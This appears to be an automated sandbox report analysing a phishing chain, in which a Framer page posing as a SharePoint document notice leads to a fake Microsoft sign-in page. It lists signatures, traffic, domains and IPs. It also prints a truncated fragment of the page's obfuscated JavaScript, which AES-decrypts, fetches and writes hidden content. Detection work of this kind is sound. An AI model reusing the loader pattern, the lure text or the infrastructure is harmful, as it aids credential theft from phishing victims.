Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://magical-variation-300980.framer.app/

Overview

General Information

Sample URL:	https://magical-variation-300980.framer.app/
Analysis ID:	1522633
Infos:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish70

AI detected landing page (webpage, office document or email)

HTML page contains suspicious javascript code

Phishing site or detected (based on various text indicators)

HTML body contains low number of good links

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTML title does not match URL

Invalid T&C link found

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

×

Process Tree

System is w10x64_ra

chrome.exe (PID: 984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 1540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1960,i,4732291734682694650,10660150200500932374,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://magical-variation-300980.framer.app/" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_112	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

HTML

Source	Rule	Description	Author	Strings
9.4.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security
9.2.pages.csv	JoeSecurity_HtmlPhish_70	Yara detected HtmlPhish_70	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

LLM: Score: 9 Reasons: The brand 'Microsoft' is a well-known brand., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'pyrofel.com' does not match the legitimate domain name for Microsoft., The URL 'pyrofel.com' does not contain any recognizable association with Microsoft., The URL 'pyrofel.com' is suspicious as it does not align with the well-known domain structure of Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the domain mismatch is a strong indicator of phishing. DOM: 9.5.pages.csv

Yara detected HtmlPhish70

Source: Yara match	File source: 9.4.pages.csv, type: HTML
Source: Yara match	File source: 9.2.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_112, type: DROPPED

HTML page contains suspicious javascript code

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: window.location.href = atob(

Phishing site or detected (based on various text indicators)

Source: Chrome DOM: 0.0

OCR Text: SharePoint YOU HAVE RECEIVED (2)-PDF DOCUMENTS FOR YOUR REVIEW All documents are available in pdf online format Reference SCN-39405-PDF-00356120 Size 12.3 MB. B ExpiryllO/07/2024 O Sign in Office 365 to review Encrypted Document Shared with you Preview Documents

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: Number of links: 0

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: Total embedded image size: 45687

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: Base64 decoded: {"a":"Apa4puLKc3ZAfSWknRgnR+5I6LZTBnpJE\/netMjqdXU=","c":"2c2ec4bc20de31a964a09e47b15aa78f","b":"b23ef74939f8ff59e9dcbd0a56efced622a6c08359f644833ee18df95ce2a39650ab057b9c448b0e642ca82078f0dff4128509ecc914d28b2361aadd96cb881ef184c169ebf7b86290dd1c8b61390d...

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: Title: Secure sign-in does not match URL

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html	HTTP Parser: Invalid link: Fruits with antioxidants help reduce inflammation.
Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html	HTTP Parser: Invalid link: Fruits help reduce the risk of heart disease and cancer.

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: async function babushka(oafishness) {  var {a,b,c,d} = json.parse(oafishness); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function zinc() {tacit.hidden = 0;gaiter.hidden = 1; document.write(await babushka(await (await fetch(await babushka(atob(`eyjhijoiqxbhnhb1tetjm1pbzlnxa25sz25skzvjnkxavejucepfxc9uzxrnanfkwfu9iiwiyyi6ijjjmmvjngjjmjbkztmxytk2ngewowu0n2ixnwfhnzhmiiwiyii6imiym2vmnzq5mzlmogzmntllowrjymqwytu2zwzjzwq2mjjhnmmwodm1owy2ndq4mznlzte4zgy5nwnlmmezoty1mgfimdu3yjljndq4yjblnjqyy2e4mja3ogywzgzmndeyoduwowvjyzkxngqyogiymzyxywfkzdk2y2i4odflzje4ngmxnjllymy3yjg2mjkwzgqxyzhinjezotbknjc5njiznjg5oddjnjnkzwy3ywqwyzllmje1mdi5oteznthim2qxmzflzwrmnwy2odriyta3mtc3ytczodmwyzbkyjrlogvmnjeyyjljymywnjcxngnjy2zizjy4otbkmtnkmmq2ognmog...

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html	HTTP Parser: No favicon
Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html	HTTP Parser: No favicon
Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html	HTTP Parser: No favicon

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: No <meta name="author".. found

Source: https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.174:443 -> 192.168.2.17:49776 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 27MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27

Source: global traffic	DNS traffic detected: DNS query: magical-variation-300980.framer.app
Source: global traffic	DNS traffic detected: DNS query: framerusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: events.framer.com
Source: global traffic	DNS traffic detected: DNS query: pyrofel.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: tekmom.exnet.su
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.174:443 -> 192.168.2.17:49776 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.win@20/28@34/240

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1960,i,4732291734682694650,10660150200500932374,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://magical-variation-300980.framer.app/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1960,i,4732291734682694650,10660150200500932374,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

AI detected landing page (webpage, office document or email)

Source: https://magical-variation-300980.framer.app/

LLM: Page contains button: 'Preview Documents' Source: '0.0.pages.csv'

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Extra Window Memory Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://magical-variation-300980.framer.app/	0%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
framerusercontent.com	1%	Virustotal		Browse
events.framer.com	0%	Virustotal		Browse
challenges.cloudflare.com	0%	Virustotal		Browse
www.google.com	0%	Virustotal		Browse
cdnjs.cloudflare.com	0%	Virustotal		Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal		Browse
pyrofel.com	1%	Virustotal		Browse
code.jquery.com	1%	Virustotal		Browse
tekmom.exnet.su	1%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
framerusercontent.com	108.138.7.13	true	false	1%, Virustotal, Browse	unknown
events.framer.com	108.156.60.14	true	false	0%, Virustotal, Browse	unknown
code.jquery.com	151.101.130.137	true	false	1%, Virustotal, Browse	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	0%, Virustotal, Browse	unknown
pyrofel.com	185.12.116.220	true	true	1%, Virustotal, Browse	unknown
challenges.cloudflare.com	104.18.94.41	true	false	0%, Virustotal, Browse	unknown
www.google.com	142.250.184.228	true	false	0%, Virustotal, Browse	unknown
tekmom.exnet.su	188.114.96.3	true	false	1%, Virustotal, Browse	unknown
magical-variation-300980.framer.app	52.223.52.2	true	false		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pyrofel.com/contractE2400/online-management/direct/auth/proposedebook.html	true		unknown
https://magical-variation-300980.framer.app/	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.138.7.13	framerusercontent.com	United States		16509	AMAZON-02US	false
104.17.24.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
108.138.7.78	unknown	United States		16509	AMAZON-02US	false
142.250.185.206	unknown	United States		15169	GOOGLEUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
74.125.133.84	unknown	United States		15169	GOOGLEUS	false
142.250.186.163	unknown	United States		15169	GOOGLEUS	false
104.18.94.41	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
142.250.185.132	unknown	United States		15169	GOOGLEUS	false
142.250.185.227	unknown	United States		15169	GOOGLEUS	false
151.101.130.137	code.jquery.com	United States		54113	FASTLYUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
108.156.60.14	events.framer.com	United States		16509	AMAZON-02US	false
3.160.150.29	unknown	United States		16509	AMAZON-02US	false
185.12.116.220	pyrofel.com	Portugal		33876	FLESK-ASPT	true
188.114.96.3	tekmom.exnet.su	European Union		13335	CLOUDFLARENETUS	false
